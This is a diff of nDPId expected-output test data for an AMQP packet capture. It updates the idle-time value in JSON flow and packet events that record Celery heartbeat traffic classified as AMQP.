@@ -1,23 +1,23 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"amqp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1490904166118} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} 
-00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"} 
-01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} 
-00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} 
+00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"} 
+01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} 
+00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 